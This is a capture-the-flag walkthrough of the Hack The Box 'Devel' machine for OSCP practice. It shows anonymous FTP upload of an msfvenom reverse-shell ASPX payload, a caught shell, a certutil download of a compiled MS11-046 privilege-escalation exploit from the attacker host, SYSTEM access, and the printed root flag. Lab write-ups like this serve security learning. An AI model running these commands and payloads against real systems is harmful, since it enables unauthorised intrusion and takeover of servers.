In this practice box from Hack The Box (HTB), we explore one of the machines from TJNull’s list, which is widely recognized as part of the essential preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull’s curated list is designed to help individuals hone their penetration testing skills and get accustomed to the types of challenges they’ll face during the OSCP. This particular box reflects the practical, hands-on nature of the OSCP certification process, providing an excellent opportunity for learners to test and expand their knowledge in a controlled, realistic environment. Whether you’re a seasoned security professional or just starting, working through this box will be a valuable step in your OSCP preparation journey.
Nmap scan
# Nmap 7.94 scan initiated Mon Oct 16 05:57:12 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/Devel/results/10.10.10.5/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/Devel/results/10.10.10.5/scans/xml/_quick_tcp_nmap.xml 10.10.10.5
Nmap scan report for 10.10.10.5
Host is up, received user-set (0.34s latency).
Scanned at 2023-10-16 05:57:19 EDT for 36s
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
80/tcp open http syn-ack Microsoft IIS httpd 7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Oct 16 05:57:55 2023 -- 1 IP address (1 host up) scanned in 43.02 seconds
No subdirectories enumerated with FFUF
Logging with FTP
╰─$ ftp 10.10.10.5 130 ↵
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49187|)
125 Data connection already open; Transfer starting.
03-18-17 02:06AM <DIR> aspnet_client
03-17-17 05:37PM 689 iisstart.htm
10-16-23 02:23PM 3427 shell.aspx
10-16-23 02:24PM 2754 shell2.aspx
03-17-17 05:37PM 184946 welcome.png
226 Transfer complete.
ftp>
we can upload here
Creating an aspx shell. First i tried with x64 which failed so i tried with x86
╭─kali@kali ~/HTB/Devel
╰─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.31 LPORT=80 EXITFUNC=thread -f aspx -o shell2.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2754 bytes
Saved as: shell2.aspx
╭─kali@kali ~/HTB/Devel
Uploaded this to the machine
ftp> binary
ftp> put shell2.aspx shell2.aspx
local: shell2.aspx remote: shell2.aspx
229 Entering Extended Passive Mode (|||49185|)
150 Opening BINARY mode data connection.
100% |****************************************************************************| 2754 15.09 MiB/s 00:00 ETA
226 Transfer complete.
2754 bytes sent in 00:00 (7.93 KiB/s)
ftp>
Ran the file on the browser –> http://10.10.10.5/shell2.aspx and listened on 80
listening on [any] 80 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.5] 49186
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web
c:\windows\system32\inetsrv>
Priv esc
checking systeminfo
:\windows\system32\inetsrv>systeminfo
systeminfo
Host Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: babis
Registered Organization:
Product ID: 55041-051-0948536-86302
Original Install Date: 17/3/2017, 4:17:31 ��
System Boot Time: 16/10/2023, 12:54:55 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 3.071 MB
Available Physical Memory: 2.372 MB
Virtual Memory: Max Size: 6.141 MB
Virtual Memory: Available: 5.430 MB
Virtual Memory: In Use: 711 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Local Area Connection 3
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.5
[02]: fe80::58c0:f1cf:abc6:bb9e
[03]: dead:beef::b1cc:9bbb:77dc:5d97
[04]: dead:beef::58c0:f1cf:abc6:bb9e
Checking online for windows 7 x86 6.1.7600 privesc
we find https://www.exploit-db.com/exploits/40564
We also find this via searchsploit and we get it to our folder
╰─$ searchsploit -m windows_x86/local/40564.c
Exploit: Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)
URL: https://www.exploit-db.com/exploits/40564
Path: /usr/share/exploitdb/exploits/windows_x86/local/40564.c
Codes: CVE-2011-1249, MS11-046
Verified: True
File Type: C source, ASCII text
cp: overwrite '/home/kali/HTB/Devel/40564.c'?
as per instruction of the script we compile it using ming –> i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32
╭─kali@kali ~/HTB/Devel
╰─$ i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32
╭─kali@kali ~/HTB/Devel
╰─$ ls
30281.txt 40564.exe ms09-053-iis-ftpd_nlst.py results shell.aspx stackadj winPEASx86.exe
40564.c encoded_shellcode.raw payload shell2.aspx shellcode winPEASx64.exe
╭─kali@kali ~/HTB/Devel
╰─$
We upload this to the windows using certutil while serving the file
c:\Users\Public\Downloads>certutil -urlcache -f http://10.10.14.31:9000/40564.exe c:\Users\Public\Downloads\40564.exe
certutil -urlcache -f http://10.10.14.31:9000/40564.exe c:\Users\Public\Downloads\40564.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
c:\Users\Public\Downloads>dir
dir
Volume in drive C has no label.
Volume Serial Number is 137F-3971
Directory of c:\Users\Public\Downloads
16/10/2023 03:22 �� <DIR> .
16/10/2023 03:22 �� <DIR> ..
16/10/2023 03:22 �� 239.983 40564.exe
16/10/2023 03:09 �� 2.388.480 winPEASx86.exe
2 File(s) 2.628.463 bytes
2 Dir(s) 4.502.626.304 bytes free
c:\Users\Public\Downloads>40564.exe
40564.exe
c:\Windows\System32>whoami
whoami
nt authority\system
c:\Windows\System32>
we have admin
c:\Users>cd administrator
cd administrator
c:\Users\Administrator>cd Desktop
cd Desktop
c:\Users\Administrator\Desktop>type root.txt
type root.txt
e621a0b5041708797c4fc4728bc72b4b
c:\Users\Administrator\Desktop>